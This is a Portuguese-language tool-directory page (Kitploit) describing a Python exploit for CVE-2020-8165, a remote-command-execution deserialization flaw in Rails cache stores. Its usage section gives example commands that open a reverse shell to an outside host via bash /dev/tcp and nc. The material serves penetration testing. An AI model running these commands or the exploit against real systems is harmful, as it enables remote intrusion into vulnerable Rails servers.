Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2020-8165 — Exploit em Python para o CVE-2020-8165 visando Rails MemCacheStore e RedisCacheStore. Permite execução remota de comandos via desserialização de objetos fornecidos pelo usuário com interface baseada em argparse. | Kitploit
Ferramentas/GitHubGitHub/hybryx/cve-2020-8165
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e Controle
GitHubhybryx/cve-2020-8165

CVE-2020-8165

Exploit em Python para o CVE-2020-8165 visando Rails MemCacheStore e RedisCacheStore. Permite execução remota de comandos via desserialização de objetos fornecidos pelo usuário com interface baseada em argparse.

Ver Repositório
42há 5 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit CVE-2020-8165 em Python

Este é um código para explorar o CVE-2020-8165 usando Python3. Este exploit funciona com rails < 5.2.4.3, rails < 6.0.3.1. O exploit permite que um atacante desserialize objetos fornecidos pelo usuário no MemCacheStore e RedisCacheStore. Este código de exploit usa ArgParse para permitir que o usuário explore essa vulnerabilidade de forma muito simples.

Uso

Há cinco argumentos para este exploit:

  • rHost - O endereço IP do host remoto, alvo
  • rPort - O número da porta do host remoto, alvo, onde o Rails está rodando
  • email - O email usado para fazer login no serviço
  • password - A senha da conta para fazer login no serviço
  • cmd - O comando a ser executado, entre aspas para considerar espaços

Exemplos:

  • python3 exploit.py 10.10.10.X 8080 [email protected] password "bash -c 'bash -i >& /dev/tcp/10.10.X.X/8989 0>&1'"
  • python3 exploit.py 10.10.10.X 8080 [email protected] password "nc 10.10.X.X 8989"

Créditos Principais

Detalhes originais do CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8165 Código exploit do Pastebin que eu aprimorei e adicionei arg parse: https://pastebin.com/jpHpdBTk

Baixar ferramenta